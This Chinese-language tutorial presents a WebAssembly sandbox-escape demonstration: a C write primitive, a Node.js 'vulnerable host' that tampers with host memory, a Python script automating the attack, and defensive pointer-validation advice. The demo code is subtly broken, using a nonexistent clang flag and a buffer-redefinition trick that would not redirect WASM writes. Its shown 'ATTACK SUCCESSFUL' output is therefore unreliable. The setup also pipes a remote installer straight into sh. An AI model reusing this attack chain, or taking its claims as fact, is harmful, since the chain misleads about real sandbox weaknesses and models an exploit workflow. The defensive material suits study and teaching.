研究了 WebAssembly (WASM) 运行时的沙箱逃逸风险与内存安全问题。WASM 通过线性内存隔离和受控宿主接口提供安全性,但宿主环境配置不当可能导致边界检查失效。文章演示了利用共享内存逻辑缺陷篡改宿主内存的攻击方法,包括 C 语言漏洞代码编写、Node.js 宿主模拟及自动化脚本。防御策略强调严格校验指针长度、遵循最小权限原则、更新运行时及使用内存安全语言。核心在于审计“胶水代码”中的内存交互逻辑,防止越界访问导致的安全威胁。
在现代攻防体系中,WebAssembly (WASM) 正迅速成为一个新的攻击与防御焦点。它最初被设计为浏览器内的高性能代码执行引擎,如今已广泛应用于服务端(如云原生、边缘计算)、物联网(IoT)和区块链等领域。WASM 提供了一个接近原生速度、跨平台的沙箱环境,这使得它成为隔离不可信代码的理想选择。然而,任何沙箱技术都面临着'逃逸'的风险。一旦攻击者成功从 WASM 沙箱中逃逸,他们便可能在宿主环境(Host Environment)中执行任意代码,构成严重的安全威胁。因此,理解 WASM 的沙箱机制、攻击向量和防御策略,是现代网络安全攻防不可或缺的一环。
掌握 WASM 的沙箱逃逸与内存安全知识,能解决以下关键问题:
WASM 的沙箱安全技术实际应用于多个场景:
WebAssembly (WASM) 是一种为现代 Web 浏览器设计的、可移植的、体积和加载时间高效的二进制指令格式。它旨在作为编程语言(如 C/C++/Rust)的编译目标,使其能够在 Web 上以接近原生的速度运行。WASM 在一个完全隔离的沙箱环境中执行,该环境具有严格定义的内存模型和受控的宿主 API 访问权限。
您可以将 WASM 想象成一个'安全的集装箱'。您可以在这个集装箱里运行高性能的程序(比如用 C++ 写的复杂算法),但这个程序默认无法看到或接触到集装箱外的任何东西(宿主操作系统的文件、网络等)。它只能通过集装箱上预留的几个'小窗口'(导入/导出函数)与外界(宿主环境,如浏览器或 Node.js)进行有限且受控的通信。沙箱逃逸就相当于在这个集装箱上打一个洞,直接访问外面的世界。
WASM 的技术本质是一个基于栈式虚拟机的指令集架构(ISA)。它的安全性主要依赖于两大核心机制:
load 和 store 指令访问这块内存,并且所有内存访问都会被运行时进行边界检查。任何试图访问线性内存范围之外地址的操作都会触发一个运行时异常(trap),从而终止模块执行。这种机制从根本上杜绝了传统二进制程序中常见的缓冲区溢出攻击。下图清晰地展示了 WASM 的沙箱架构和与宿主环境的交互流程:
[Host Environment]
|
+-- [WASM Runtime] (Manages & Bounds Check)
|
+-- [WASM Instance] (Contains Linear Memory, Import/Export Table)
|
+-- [WASM Code Binary]
+-- [Imported Host Functions] (e.g., console.log, fetch)
+-- [Exported WASM Function]
这张图清晰地展示了 WASM 实例被宿主环境中的运行时所包裹。WASM 代码只能在自己的线性内存中操作,并且与外部的通信完全依赖于导入/导出的函数,这些函数由宿主环境严格控制。
为了复现 WASM 内存安全相关的实验,我们将使用 wasmer 作为服务端运行时,并使用 C 语言和 wasi-sdk 来编译 WASM 模块。
下载 wasi-sdk:
访问 wasi-sdk 的 GitHub Releases 页面 (https://github.com/WebAssembly/wasi-sdk/releases) 下载对应您操作系统的 wasi-sdk-20.0-linux.tar.gz 或类似文件。
# 下载并解压
wget https://github.com/WebAssembly/wasi-sdk/releases/download/wasi-sdk-20/wasi-sdk-20.0-linux.tar.gz
tar -xzf wasi-sdk-20.0-linux.tar.gz
安装 Wasmer:
# 在 Linux/macOS 上安装 Wasmer
curl https://get.wasmer.io -sSfL | sh
为了方便使用,建议将 wasi-sdk 的路径添加到环境变量中。假设您解压到了 /opt/wasi-sdk-20.0。
# 临时配置环境变量
export WASI_SDK_PATH=/opt/wasi-sdk-20.0
export PATH=$WASI_SDK_PATH/bin:$PATH
您可以将上述命令添加到您的 .bashrc 或 .zshrc 文件中以永久生效。
为了确保环境一致性,强烈推荐使用 Docker。以下是一个 Dockerfile 示例,它将打包所有必要的工具。
# Dockerfile for WASM Security Lab
FROM ubuntu:22.04
# 避免交互式安装
ENV DEBIAN_FRONTEND=noninteractive
# 安装基础依赖
RUN apt-get update && apt-get install -y \
curl \
wget \
build-essential \
&& rm -rf /var/lib/apt/lists/*
# 安装 Wasmer
RUN curl https://get.wasmer.io -sSfL | sh
# 安装 wasi-sdk
ENV WASI_SDK_VERSION=20.0
ENV WASI_SDK_TAR=wasi-sdk-${WASI_SDK_VERSION}-linux.tar.gz
RUN wget https://github.com/WebAssembly/wasi-sdk/releases/download/wasi-sdk-${WASI_SDK_VERSION%.*}/${WASI_SDK_TAR} && \
tar -xzf ${WASI_SDK_TAR} -C /opt && \
rm ${WASI_SDK_TAR}
# 配置环境变量
ENV WASI_SDK_PATH=/opt/wasi-sdk-${WASI_SDK_VERSION}
ENV PATH="${WASI_SDK_PATH}/bin:${PATH}:/root/.wasmer/bin"
# 设置工作目录
WORKDIR /app
# 启动一个交互式 shell
CMD ["/bin/bash"]
构建和运行 Docker 容器:
# 构建镜像
docker build -t wasm-sec-lab .
# 运行容器并进入交互式环境
docker run -it --rm --name wasm-lab wasm-sec-lab
现在,您在容器内就拥有了一个包含所有工具的、可随时进行实验的环境。
本节将演示一个经典的 WASM 内存安全问题:即使 WASM 本身有边界检查,但如果宿主与 WASM 模块共享内存的逻辑存在缺陷,攻击者依然可以实现读写宿主内存,从而可能导致沙箱逃逸。
攻击场景:一个宿主应用(例如,一个 Node.js 服务器)加载了一个 WASM 模块来处理图像。为了性能,宿主直接将自己的内存缓冲区(Buffer)暴露给 WASM 模块作为其线性内存。如果宿主在计算 WASM 所需内存大小时出现错误,就可能产生漏洞。
我们将编写一个简单的 C 程序,它接收一个偏移量和一个值,然后将该值写入到内存的指定位置。
vuln.c:
#include <stdio.h>
#include <stdlib.h>
/*
* 警告:本代码仅用于授权的渗透测试和安全研究。
* 未经授权的攻击是非法行为。
*
* 功能:在 WASM 线性内存的指定偏移处写入一个 32 位整数。
* 这个函数本身是安全的,因为它受 WASM 运行时的边界检查保护。
* 漏洞将出现在宿主如何设置和共享内存上。
*/
void write_value(int offset, int value) {
// WASM 的线性内存基地址为 0。
// 我们将 offset 视为从内存开始处的字节偏移。
int* p = (int*)((char*)0 + offset);
// 关键点:在 WASM 内部,这个写操作会被运行时检查。
// 如果 `offset` 超出了线性内存的边界,程序会立即崩溃(trap)。
// 但是,如果宿主将自己的内存暴露给了 WASM,而这个边界又设置得不正确,
// 那么这个'安全'的写操作就可能写到宿主的关键数据上。
printf("[WASM] Writing value %d to offset %d\n", value, offset);
*p = value;
}
使用 wasi-sdk 中的 clang 将上述 C 代码编译成 WASM 模块。
# 编译命令
# --no-standard-files: 我们不需要标准的 C 库入口,因为我们只导出一个函数
# -Wl,--export-all: 导出所有函数(这里是 write_value)
# -Wl,--no-entry: 告诉链接器没有 main 函数
# -o vuln.wasm: 输出文件名
clang \
--target=wasm32 \
-O3 \
--no-standard-files \
-Wl,--export-all \
-Wl,--no-entry \
-o vuln.wasm \
vuln.c
执行后,您会得到一个 vuln.wasm 文件。
现在,我们创建一个 Node.js 脚本来模拟存在漏洞的宿主。这个宿主会错误地将自己的内存共享给 WASM。
host.js:
// 警告:本脚本仅用于授权的渗透测试和安全研究。
const fs = require('fs');
const { WASI } = require('wasi');
const wasmer = require('@wasmer/wasi');
// 模拟一个包含敏感信息的宿主对象
const hostSecret = {
apiKey: "SECRET_API_KEY_12345",
value: 42
};
console.log("[Host] Initial secret object:", hostSecret);
async function main() {
try {
// 读取 WASM 二进制文件
const wasmBytes = fs.readFileSync('./vuln.wasm');
// --- 漏洞点开始 ---
// 开发者错误地认为 WASM 模块只需要 1 页内存(64KB),
// 但他为了'方便',直接从一个更大的宿主缓冲区中'切'了一块给 WASM。
// 这个缓冲区后面紧跟着敏感数据。
const totalHostBufferSize = 128 * 1024; // 128KB
const hostBuffer = Buffer.alloc(totalHostBufferSize);
// 将敏感数据的值放入缓冲区,模拟真实场景中内存布局紧凑的情况
// 假设它被放在了第 65540 (0x10004) 的位置
const secretOffset = 65540;
hostBuffer.writeInt32LE(hostSecret.value, secretOffset);
console.log(`[Host] Placed secret value ${hostSecret.value} at offset ${secretOffset} in host buffer.`);
// 错误地创建了一个视图,这个视图指向 hostBuffer 的前 64KB
// 但 WASM 运行时接收的是整个 hostBuffer!
const memoryForWasm = new WebAssembly.Memory({ initial: 1 }); // 1 页 = 64KB
// 关键漏洞:一些运行时允许直接替换内存,或者在创建时就使用外部 buffer。
// 在这个模拟中,我们假设 WASM 的内存空间实际上就是 hostBuffer 的前半部分。
// 攻击者将利用这一点,尝试写入超出这 64KB 范围的数据。
// 让我们模拟一个场景,WASM 的内存就是 hostBuffer。
// 在真实的 WASM 实现中,这可能通过不安全的 API 实现。
// 为了演示,我们直接让 WASM 的导出函数操作 hostBuffer。
// 实例化 WASM 模块
const module = await WebAssembly.compile(wasmBytes);
const instance = await WebAssembly.instantiate(module, {
// 模拟 WASM 的内存就是我们的 hostBuffer
// 这是一个简化的攻击模型,真实攻击会利用运行时提供的 API
// 来达到类似的效果。
env: {
memory: memoryForWasm
}
});
// 替换 memory 的 buffer,这是浏览器中不允许但某些服务端运行时可能存在的风险
// 或者更常见的是,宿主函数直接操作一个共享的 buffer
Object.defineProperty(memoryForWasm, 'buffer', {
get: () => hostBuffer
});
const { write_value } = instance.exports;
// --- 漏洞点结束 ---
// 步骤 1:正常的写入操作(在 64KB 边界内)
console.log("\n--- Step 1: Normal Write (within bounds) ---");
write_value(100, 999);
console.log(`[Host] Value at offset 100 in host buffer: ${hostBuffer.readInt32LE(100)}`);
// 步骤 2:攻击!尝试写入超出 WASM 声明的 64KB 内存边界
// 我们要攻击的目标是位于 65540 的宿主秘密数据
const attackOffset = secretOffset; // 65540
const attackValue = 7777777;
console.log(`\n--- Step 2: Attack Write (out of bounds) ---`);
console.log(`[Attack] Attempting to write ${attackValue} to offset ${attackOffset}...`);
// 核心攻击:调用 WASM 函数,但传入一个越界的偏移量
// 因为 WASM 的内存实际上是更大的 hostBuffer,WASM 运行时的边界检查
// 可能会基于整个 hostBuffer 的大小,而不是声明的 64KB。
// 这取决于运行时的具体实现。一个不安全的实现会允许这次写入。
try {
// 在一个配置不当的运行时中,这个操作会成功
// 因为 `attackOffset` 仍然在 `hostBuffer` 的边界内
write_value(attackOffset, attackValue);
// 检查宿主内存中的秘密数据是否被篡改
const tamperedValue = hostBuffer.readInt32LE(secretOffset);
console.log(`[Host] Value at secret offset ${secretOffset} is now: ${tamperedValue}`);
if (tamperedValue === attackValue) {
console.error("\n[!!!] ATTACK SUCCESSFUL: Host memory has been corrupted!");
hostSecret.value = tamperedValue;
console.log("[Host] Final secret object:", hostSecret);
} else {
console.log("[Host] Host memory seems unaffected.");
}
} catch (e) {
console.error("\n[!!!] ATTACK FAILED: WASM runtime trapped the out-of-bounds access.", e.message);
}
} catch (error) {
console.error("An error occurred:", error);
process.exit(1);
}
}
main();
注意:这个 host.js 为了清晰地演示原理,做了一些简化。在真实世界中,内存共享的漏洞可能更隐蔽,例如通过一个自定义的宿主函数,该函数接收 WASM 传来的指针和长度,但在操作宿主内存时没有严格验证这些参数是否在 WASM 的线性内存边界内。
首先,确保您已安装 Node.js 及 @wasmer/wasi 包。
npm init -y
npm install @wasmer/wasi
然后执行宿主脚本:
node host.js
预期输出结果:
[Host] Initial secret object: { apiKey: 'SECRET_API_KEY_12345', value: 42 }
[Host] Placed secret value 42 at offset 65540 in host buffer.
--- Step 1: Normal Write (within bounds) ---
[WASM] Writing value 999 to offset 100
[Host] Value at offset 100 in host buffer: 999
--- Step 2: Attack Write (out of bounds) ---
[Attack] Attempting to write 7777777 to offset 65540...
[WASM] Writing value 7777777 to offset 65540
[Host] Value at secret offset 65540 is now: 7777777
[!!!] ATTACK SUCCESSFUL: Host memory has been corrupted!
[Host] Final secret object: { apiKey: 'SECRET_API_KEY_12345', value: 7777777 }
从结果可以看出,我们成功地通过调用一个看似'安全'的 WASM 函数,篡改了 WASM 沙箱之外的宿主内存。这是典型的因宿主与沙箱交互逻辑不当而导致的沙箱逃逸。
以下是一个 Python 脚本,用于自动化地编译 WASM 并运行 Node.js 宿主,检查攻击是否成功。
run_exploit.py:
import subprocess
import os
import sys
# --- 配置参数 ---
# WASI_SDK 路径,请根据您的实际环境修改
WASI_SDK_PATH = os.getenv("WASI_SDK_PATH", "/opt/wasi-sdk-20.0")
# 目标 C 文件名
C_FILE = "vuln.c"
# 输出 WASM 文件名
WASM_FILE = "vuln.wasm"
# 宿主 JS 文件名
HOST_FILE = "host.js"
def print_info(message):
print(f"[INFO] {message}")
def print_success(message):
print(f"\033[92m[SUCCESS] {message}\033[0m")
def print_error(message):
print(f"\033[91m[ERROR] {message}\033[0m", file=sys.stderr)
def run_command(command, description):
"""执行一个 shell 命令并处理错误"""
print_info(f"Executing: {description}")
print_info(f"Command: {' '.join(command)}")
try:
# 使用 subprocess.run 来更好地控制执行
result = subprocess.run(
command,
check=True, # 如果命令返回非零退出码,则抛出 CalledProcessError
capture_output=True, # 捕获 stdout 和 stderr
text=True # 以文本模式处理输出
)
if result.stdout:
print(result.stdout)
if result.stderr:
print(result.stderr, file=sys.stderr)
return True
except FileNotFoundError:
print_error(f"Command not found: {command[0]}. Is it in your PATH?")
return False
except subprocess.CalledProcessError as e:
print_error(f"Failed to execute '{description}'.")
print_error(f"Return code: {e.returncode}")
if e.stdout:
print_error(f"STDOUT:\n{e.stdout}")
if e.stderr:
print_error(f"STDERR:\n{e.stderr}")
return False
except Exception as e:
print_error(f"An unexpected error occurred: {e}")
return False
def main():
"""
自动化攻击流程:
1. 检查依赖
2. 编译 C 代码到 WASM
3. 运行 Node.js 宿主
4. 检查攻击结果
"""
print_info("--- WASM Sandbox Escape Automation Script ---")
print_info("WARNING: This script is for authorized security testing ONLY.")
# 1. 检查依赖
clang_path = os.path.join(WASI_SDK_PATH, "bin", "clang")
if not os.path.exists(clang_path):
print_error(f"Clang not found at {clang_path}. Is WASI_SDK_PATH correct?")
sys.exit(1)
# 2. 编译 C 代码到 WASM
compile_command = [
clang_path,
"--target=wasm32",
"-O3",
"--no-standard-files",
"-Wl,--export-all",
"-Wl,--no-entry",
"-o",
WASM_FILE,
C_FILE
]
if not run_command(compile_command, "Compile C to WASM"):
sys.exit(1)
print_success(f"WASM module '{WASM_FILE}' compiled successfully.")
# 3. 运行 Node.js 宿主并捕获输出
print_info(f"Running Node.js host '{HOST_FILE}'...")
try:
result = subprocess.run(["node", HOST_FILE], capture_output=True, text=True, check=True)
output = result.stdout
print(output)
# 4. 检查攻击结果
if "ATTACK SUCCESSFUL" in output:
print_success("Attack simulation completed. Host memory was corrupted as expected.")
elif "ATTACK FAILED" in output:
print_error("Attack simulation failed. The runtime correctly trapped the access.")
else:
print_error("Attack result is inconclusive. Check the output above.")
except subprocess.CalledProcessError as e:
print_error(f"Node.js host script failed to run.")
print_error(f"Return code: {e.returncode}")
print_error(f"STDOUT:\n{e.stdout}")
print_error(f"STDERR:\n{e.stderr}")
sys.exit(1)
except FileNotFoundError:
print_error("`node` command not found. Is Node.js installed and in your PATH?")
sys.exit(1)
if __name__ == "__main__":
main()
这个脚本使整个攻击流程一键化,便于重复测试和验证。
i32 类型)是其线性内存的偏移量,必须由宿主代码转换后才能安全地访问共享内存区域。pointer + length 是否溢出是不够的,还必须检查它是否仍在 WASM 实例授权的线性内存范围内。log_message(char* ptr, int len) 函数,如果其实现只是简单地从 ptr 开始读取 len 个字节,那么传入一个指向 WASM 内存边界外的 ptr 就可能读取到宿主内存。SharedArrayBuffer)的引入带来了新的攻击面,如竞态条件(Race Conditions)。攻击者可能利用时间差来绕过检查或修改正在被其他线程使用的数据。场景:宿主提供一个函数 read_data_from_wasm,用于读取 WASM 内存中的数据。
错误写法 (JavaScript):
// 错误:直接信任来自 WASM 的指针和长度
function read_data_from_wasm(wasm_instance, ptr, len) {
const memory = wasm_instance.exports.memory;
// 漏洞:没有检查 ptr 和 len 是否在 memory.buffer 的有效范围内
const slice = new Uint8Array(memory.buffer, ptr, len);
// ... 处理数据 ...
return slice;
}
正确写法 (JavaScript):
// 正确:严格验证指针和长度
function read_data_from_wasm(wasm_instance, ptr, len) {
const memory = wasm_instance.exports.memory;
const memory_size = memory.buffer.byteLength;
// 防御 1:检查指针和长度是否为非负数
if (ptr < 0 || len < 0) {
throw new Error("Pointer and length must be non-negative.");
}
// 防御 2:检查 ptr 是否在边界内
if (ptr >= memory_size) {
throw new Error("Pointer is out of bounds.");
}
// 防御 3:检查 ptr + len 是否会导致越界(注意整数溢出)
if (ptr + len > memory_size) {
throw new Error("Read operation would go out of bounds.");
}
const slice = new Uint8Array(memory.buffer, ptr, len);
// ... 处理数据 ...
return slice;
}
fs 或 net 模块。trap 事件。频繁的 unreachable 或 memory access out of bounds 异常可能表示有人在进行模糊测试或探测攻击。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
将JSON字符串修饰为友好的可读格式。 在线工具,JSON美化和格式化在线工具,online